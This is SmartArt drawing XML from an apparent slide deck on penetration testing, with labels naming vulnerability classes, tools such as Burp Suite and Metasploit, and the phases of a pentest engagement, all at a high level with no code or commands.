    <dsp:sp modelId="{29F5E6A5-E783-4AAC-9643-F4CEF2942515}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3626893" y="749723"/>
          <a:ext cx="3181456" cy="1784250"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:tint val="40000"/>
            <a:alpha val="90000"/>
            <a:hueOff val="474929"/>
            <a:satOff val="46882"/>
            <a:lumOff val="31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Sharing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3626893" y="749723"/>
        <a:ext cx="3181456" cy="17842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E09D-CF03-49D3-9A80-9E0807295655}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1138244" y="2456050"/>
          <a:ext cx="2025011" cy="101250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RCE</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1167899" y="2485705"/>
        <a:ext cx="1965701" cy="953195"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B3870EF8-E226-491B-9A8D-94118E972F77}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="17296518">
          <a:off x="2276727" y="1720534"/>
          <a:ext cx="2583062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2583062" y="1538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03682" y="1671338"/>
        <a:ext cx="129153" cy="129153"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B449135-50FA-411A-87E6-68D99E38F9AD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3973261" y="3274"/>
          <a:ext cx="2025011" cy="101250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Buffer Overflow</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4002916" y="32929"/>
        <a:ext cx="1965701" cy="953195"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DC000199-A63A-4F6D-B581-DB2D573A58A1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="18289469">
          <a:off x="2859052" y="2364731"/>
          <a:ext cx="1418412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418412" y="1538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2798" y="2344651"/>
        <a:ext cx="70920" cy="70920"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50209067-CD63-48B2-8845-7E70BB001747}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3973261" y="1167656"/>
          <a:ext cx="2025011" cy="126052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Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4010181" y="1204576"/>
        <a:ext cx="1951171" cy="1186689"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{515476AD-CB98-4717-A892-CE1AE84F5D72}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="522264">
          <a:off x="3158537" y="3008928"/>
          <a:ext cx="819442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819442" y="1538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7772" y="3003822"/>
        <a:ext cx="40972" cy="40972"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{943F440C-FD04-493E-8B4E-11F22D5A36E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3973261" y="2580061"/>
          <a:ext cx="2025011" cy="101250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Deserialization Vulnerability</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4002916" y="2609716"/>
        <a:ext cx="1965701" cy="953195"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A3424FEE-6A33-4D80-B236-41B595EF87EB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="3470561">
          <a:off x="2807327" y="3591118"/>
          <a:ext cx="1521862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521862" y="1538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0212" y="3568453"/>
        <a:ext cx="76093" cy="76093"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{93B7F0A3-5CF4-44F3-A202-61506D047FF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3973261" y="3744443"/>
          <a:ext cx="2025011" cy="101250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File Upload RCE</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4002916" y="3774098"/>
        <a:ext cx="1965701" cy="953195"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9E482FF0-62B5-4F85-BE93-5B460564776F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="4303482">
          <a:off x="2276727" y="4173309"/>
          <a:ext cx="2583062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2583062" y="1538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03682" y="4124114"/>
        <a:ext cx="129153" cy="129153"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0AB94F55-0FD9-4828-A93D-20490EBB7E8D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3973261" y="4908825"/>
          <a:ext cx="2025011" cy="1012505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Remote File Inclusion (RFI)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4002916" y="4938480"/>
        <a:ext cx="1965701" cy="953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A04E3-FDFF-453B-96A6-23A4F5C52E84}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="467859"/>
          <a:ext cx="5709921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153" tIns="374904" rIns="44315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 web application security testing tool used for scanning, crawling, and manipulating web applications to identify and exploit vulnerabilities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="467859"/>
        <a:ext cx="5709921" cy="1474200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CAB69CAC-61C7-4936-91FE-4C252893B0EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="285496" y="202179"/>
          <a:ext cx="320562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75" tIns="0" rIns="1510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Burp Suite</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="311435" y="228118"/>
        <a:ext cx="3153751" cy="479482"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{06214F4A-CEA2-48A0-A631-9F9F4E2730AE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2304940"/>
          <a:ext cx="5709921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153" tIns="374904" rIns="44315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An open-source penetration testing framework that provides tools for developing, testing, and executing exploits against a target system, with a large database of known vulnerabilities and attack techniques.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2304940"/>
        <a:ext cx="5709921" cy="1701000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{86B53AC1-73D6-428A-BFA1-7CBFF24D431D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="285496" y="2039259"/>
          <a:ext cx="320562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75" tIns="0" rIns="1510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Metasploit</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="311435" y="2065198"/>
        <a:ext cx="3153751" cy="479482"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{68BC9EC0-7B1D-4D5E-A894-0DB85B2846D8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4368820"/>
          <a:ext cx="5709921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153" tIns="374904" rIns="44315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 Debian-based Linux distribution designed for digital forensics, penetration testing, and security research, equipped with a wide range of tools for various cybersecurity tasks</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="4368820"/>
        <a:ext cx="5709921" cy="1474200"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{99DFC062-7202-4C35-9C44-3C7AB530A6AE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="285496" y="4103140"/>
          <a:ext cx="399694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75" tIns="0" rIns="15107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Kali Linux</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="311435" y="4129079"/>
        <a:ext cx="3945066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B0ECF-FBCA-4EF4-87DE-A26BCB5CA7EB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="253672" y="2975878"/>
          <a:ext cx="2703385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Penetration testing process</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i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276970" y="2999176"/>
        <a:ext cx="2656789" cy="748844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{49EFDB88-B92A-43D4-9293-4D84ED0CD031}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="17051759">
          <a:off x="1977823" y="2104425"/>
          <a:ext cx="259482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594821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10364" y="2050937"/>
        <a:ext cx="129741" cy="129741"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5ED76F30-F21F-4936-9F25-37834B240C1A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3593411" y="460296"/>
          <a:ext cx="293947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Pre-engagement Phase</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3616709" y="483594"/>
        <a:ext cx="2892876" cy="748844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7C3D5C99-09E9-4F54-8006-E96AE45392DF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="19457599">
          <a:off x="6459224" y="617945"/>
          <a:ext cx="78367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3670" y="1138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1468" y="609735"/>
        <a:ext cx="39183" cy="39183"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B239EA25-B8DC-4F6A-AEFC-4D92389D701E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7169236" y="2917"/>
          <a:ext cx="269764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Define Scope</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7192534" y="26215"/>
        <a:ext cx="2651046" cy="748844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{80723A8A-FDE8-4DFA-9211-8B8261EE5BED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="2142401">
          <a:off x="6459224" y="1075324"/>
          <a:ext cx="78367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3670" y="1138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1468" y="1067114"/>
        <a:ext cx="39183" cy="39183"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FF64C604-8CEA-42BF-B3E9-C126DDA5C76D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7169236" y="917674"/>
          <a:ext cx="269764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Gather Information</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7192534" y="940972"/>
        <a:ext cx="2651046" cy="748844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0A46B755-C71F-46DF-A949-4D433FA951A0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="19457599">
          <a:off x="9793220" y="1075324"/>
          <a:ext cx="78367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3670" y="1138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5463" y="1067114"/>
        <a:ext cx="39183" cy="39183"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{98ADB92E-6B66-4ED8-A365-A518F50F0F67}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="10503231" y="460296"/>
          <a:ext cx="2521086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Passive Reconnaissance</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="10526529" y="483594"/>
        <a:ext cx="2474490" cy="748844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2670C067-CB35-41A7-B5CC-34873CF4B288}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="2142401">
          <a:off x="9793220" y="1532702"/>
          <a:ext cx="78367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83670" y="1138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165463" y="1524492"/>
        <a:ext cx="39183" cy="39183"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{14D5FDA6-D06E-407F-B589-A77E260919F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="10503231" y="1375053"/>
          <a:ext cx="2521086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Active Reconnaissance</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="10526529" y="1398351"/>
        <a:ext cx="2474490" cy="748844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1519E079-0809-44E5-AA2D-99EE7208A316}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="20413970">
          <a:off x="2937135" y="3247872"/>
          <a:ext cx="6761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76197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8329" y="3242349"/>
        <a:ext cx="33809" cy="33809"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AE4C888D-7118-4BFB-999A-F7759DEE1984}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3593411" y="2747189"/>
          <a:ext cx="293947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Vulnerability discovery Phase</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3616709" y="2770487"/>
        <a:ext cx="2892876" cy="748844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{67104284-3302-4E00-A8C5-789BCA8DAA53}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="18289469">
          <a:off x="6293896" y="2676149"/>
          <a:ext cx="1114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14327" y="1138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3201" y="2659672"/>
        <a:ext cx="55716" cy="55716"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5905D779-965D-4068-986E-71426A75FD19}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7169236" y="1832431"/>
          <a:ext cx="269764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Vulnerability Scanning</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7192534" y="1855729"/>
        <a:ext cx="2651046" cy="748844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A6A9C7FC-9147-4598-BC5E-FC20E01EE7E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6532883" y="3133527"/>
          <a:ext cx="63635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36352" y="1138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5151" y="3129000"/>
        <a:ext cx="31817" cy="31817"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{15486DDF-0DCA-40A0-B85F-71CA7A341155}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7169236" y="2747189"/>
          <a:ext cx="269764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Network Discovery</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7192534" y="2770487"/>
        <a:ext cx="2651046" cy="748844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{83DC5FA6-66FB-44B9-A3EE-459B1AB79693}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="3310531">
          <a:off x="6293896" y="3590906"/>
          <a:ext cx="1114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14327" y="1138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3201" y="3574429"/>
        <a:ext cx="55716" cy="55716"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BB4CAAB3-0DDC-46FD-A230-5DD8AAD02D7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7169236" y="3661946"/>
          <a:ext cx="269764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Manual Penetration</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7192534" y="3685244"/>
        <a:ext cx="2651046" cy="748844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{ED9D0F85-1789-462F-B716-4A32DDBF2842}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="2829178">
          <a:off x="2807358" y="3705250"/>
          <a:ext cx="9357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5753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1840" y="3693238"/>
        <a:ext cx="46787" cy="46787"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{18B0B436-DFF0-443A-B454-3951E93BFE65}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3593411" y="3661946"/>
          <a:ext cx="293947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Exploitation of Vulnerabilities</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3616709" y="3685244"/>
        <a:ext cx="2892876" cy="748844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{693A979C-DC12-44DF-A074-F07B6196A5E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="4099285">
          <a:off x="2413900" y="4162629"/>
          <a:ext cx="172266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22668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32167" y="4130944"/>
        <a:ext cx="86133" cy="86133"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9DD4ABD0-A59E-445F-B1BD-9A4AEB5A0C7D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3593411" y="4576703"/>
          <a:ext cx="293947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Post-Penetration Phase</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3616709" y="4600001"/>
        <a:ext cx="2892876" cy="748844"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DF86A2E5-D657-4D9D-9FA0-8314F6C76A75}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="4548241">
          <a:off x="1977823" y="4620007"/>
          <a:ext cx="259482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594821" y="1138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10364" y="4566519"/>
        <a:ext cx="129741" cy="129741"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FA9C2F15-D8B0-49A6-99EF-36ED91016DED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3593411" y="5491460"/>
          <a:ext cx="2939472" cy="795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Reporting Phase</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3616709" y="5514758"/>
        <a:ext cx="2892876" cy="748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B0ECF-FBCA-4EF4-87DE-A26BCB5CA7EB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="377950" y="3013893"/>
          <a:ext cx="1695901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White Hat</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="396008" y="3031951"/>
        <a:ext cx="1659785" cy="580427"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{49EFDB88-B92A-43D4-9293-4D84ED0CD031}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16830559">
          <a:off x="968366" y="1983921"/>
          <a:ext cx="27042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04206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52864" y="1925138"/>
        <a:ext cx="135210" cy="135210"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5ED76F30-F21F-4936-9F25-37834B240C1A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2567086" y="355049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Vulnerability Scan</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2585144" y="373107"/>
        <a:ext cx="2496558" cy="580427"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7C3D5C99-09E9-4F54-8006-E96AE45392DF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="19457599">
          <a:off x="5042668" y="477243"/>
          <a:ext cx="6074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07420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1193" y="470879"/>
        <a:ext cx="30371" cy="30371"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B239EA25-B8DC-4F6A-AEFC-4D92389D701E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5592996" y="537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DAST</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5611054" y="18595"/>
        <a:ext cx="1857486" cy="580427"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{80723A8A-FDE8-4DFA-9211-8B8261EE5BED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="2142401">
          <a:off x="5042668" y="831756"/>
          <a:ext cx="6074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07420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1193" y="825392"/>
        <a:ext cx="30371" cy="30371"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FF64C604-8CEA-42BF-B3E9-C126DDA5C76D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5592996" y="709562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SAST</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5611054" y="727620"/>
        <a:ext cx="1857486" cy="580427"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1519E079-0809-44E5-AA2D-99EE7208A316}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="17945813">
          <a:off x="1813326" y="2870203"/>
          <a:ext cx="10142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14285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5112" y="2853667"/>
        <a:ext cx="50714" cy="50714"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AE4C888D-7118-4BFB-999A-F7759DEE1984}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2567086" y="2127612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Penetration test</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2585144" y="2145670"/>
        <a:ext cx="2496558" cy="580427"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{67104284-3302-4E00-A8C5-789BCA8DAA53}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="18289469">
          <a:off x="4914523" y="2072549"/>
          <a:ext cx="86371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63711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4785" y="2059779"/>
        <a:ext cx="43185" cy="43185"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5905D779-965D-4068-986E-71426A75FD19}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5592996" y="1418587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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0"/>
            <a:t>lack Box</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5611054" y="1436645"/>
        <a:ext cx="1857486" cy="580427"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A6A9C7FC-9147-4598-BC5E-FC20E01EE7E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
